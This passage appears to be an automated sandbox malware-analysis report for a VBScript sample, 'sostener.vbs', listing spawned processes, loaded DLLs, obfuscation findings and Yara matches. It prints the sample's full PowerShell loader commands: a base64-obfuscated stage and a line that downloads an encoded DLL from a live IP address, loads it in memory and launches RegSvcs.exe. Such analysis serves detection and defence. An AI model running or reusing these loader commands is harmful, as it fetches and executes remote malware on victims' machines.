            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
            Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: sostener.vbs | Static file information: File size 1977486 > 1048576

            Data Obfuscation

            Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("powershell $ExeNy = 'J?Bx?Gs?dgB3?HI?I??9?C??Jw?w?Cc?Ow?k?Gk?YQBx?HU?Yw?g", "0", "false");
            Source: 3.2.powershell.exe.18506078440.1.raw.unpack, Class1.cs | .Net Code: ZxKHG System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.1851cfd0000.4.raw.unpack, Class1.cs | .Net Code: ZxKHG System.AppDomain.Load(byte[])
            Source: 3.2.powershell.exe.18504da3b80.2.raw.unpack, Class1.cs | .Net Code: ZxKHG System.AppDomain.Load(byte[])
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: $ExeNy = 'J?Bx?Gs?dgB3?HI?I??9?C??Jw?w?Cc?Ow?k?Gk?YQBx?HU?Yw?g?D0?I??n?CU?c?B6?EE?YwBP?Gc?SQBu?E0?cg?l?Cc?OwBb?EI?eQB0?GU?WwBd?F0?I??k?Hk?dwBq?GQ?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??o?E4?ZQB3?C0?TwBi?Go?ZQBj?HQ?I?BO?GU?d??u?Fc?ZQBi?EM?b?Bp?GU?bgB0?Ck?LgBE?G8?dwBu?Gw?bwBh?GQ?UwB0?HI?aQBu?Gc?K??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?Rg?z?GQ?b?Bs?C4?d?B4?HQ?Jw?p?Ck?OwBb?HM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?Hk?dwBq?GQ?a??p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?QwBs?GE?cwBz?Ew?aQBi?HI?YQBy?Hk?MQ?u?EM?b?Bh?HM?cw?x?Cc?KQ?u?Ec?ZQB0?E0?ZQB0?Gg?bwBk?Cg?JwBa?Hg?SwBI?Ec?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?Cc?d?B4?HQ?Lg?x?Eo?R??v?FM?VgBO?EU?LwB6?HI?YQBN?C8?ZwBl?FI?LwBr?GE?V??v?Dk?Ng?x?C4?Mw?z?DI?Lg?y?D??Mg?u?DE?OQ?v?C8?OgBw?HQ?d?Bo?Cc?I??s?C??J?Bp?GE?cQB1?GM?I??s?C??JwBS?Gc?dgB1?Ec?Jw?s?C??J?Bx?Gs?dgB3?HI?L??g?Cc?MQ?n?Cw?I??n?FI?bwBk?GE?Jw?g?Ck?KQ?7??==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('?','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;$global:?
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
            Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bx Gs dgB3 HI I 9 C Jw w Cc Ow k Gk YQBx HU Yw g D0 I n CU c B6 EE YwBP Gc SQBu E0 cg l Cc OwBb EI eQB0 GU WwBd F0 I k Hk dwBq GQ a g D0 I Bb HM eQBz HQ ZQBt C4 QwBv G4 dgBl HI d Bd Do OgBG HI bwBt EI YQBz GU Ng 0 FM d By Gk bgBn Cg I o E4 ZQB3 C0 TwBi Go ZQBj HQ I BO GU d u Fc ZQBi EM b Bp GU bgB0 Ck LgBE G8 dwBu Gw bwBh GQ UwB0 HI aQBu Gc K n Gg d B0 H Og v C8 OQ x C4 Mg w DI Lg y DM Mw u DE Ng 5 C8 V Bh Gs LwBS GU Zw v E0 YQBy Ho LwBE FI Rw v FI V BD C8 Rg z GQ b Bs C4 d B4 HQ Jw p Ck OwBb HM eQBz HQ ZQBt C4 QQBw H R Bv G0 YQBp G4 XQ 6 Do QwB1 HI cgBl G4 d BE G8 bQBh Gk bg u Ew bwBh GQ K k Hk dwBq GQ a p C4 RwBl HQ V B5 H ZQ o Cc QwBs GE cwBz Ew aQBi HI YQBy Hk MQ u EM b Bh HM cw x Cc KQ u Ec ZQB0 E0 ZQB0 Gg bwBk Cg JwBa Hg SwBI Ec Jw p C4 SQBu HY bwBr GU K k G4 dQBs Gw L g Fs bwBi Go ZQBj HQ WwBd F0 I o Cc d B4 HQ Lg x Eo R v FM VgBO EU LwB6 HI YQBN C8 ZwBl FI LwBr GE V v Dk Ng x C4 Mw z DI Lg y D Mg u DE OQ v C8 OgBw HQ d Bo Cc I s C J Bp GE cQB1 GM I s C JwBS Gc dgB1 Ec Jw s C J Bx Gs dgB3 HI L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$qkvwr = '0';$iaquc = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $ywjdh = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/F3dll.txt'));[system.AppDomain]::CurrentDomain.Load($ywjdh).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1JD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $iaquc , 'RgvuG', $qkvwr, '1', 'Roda' ));"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_00007FFD9B890962 push E85E465Dh; ret 1_2_00007FFD9B8909F9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B890875 push E95E463Ch; ret 3_2_00007FFD9B890899

            Boot Survival

            Source: Yara match | File source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.powershell.exe.18504e7a558.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 3.2.powershell.exe.18504e7a558.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000004.00000002.2957234369.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.1690160988.0000018504E7A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4312, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6884, type: MEMORYSTR
            Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
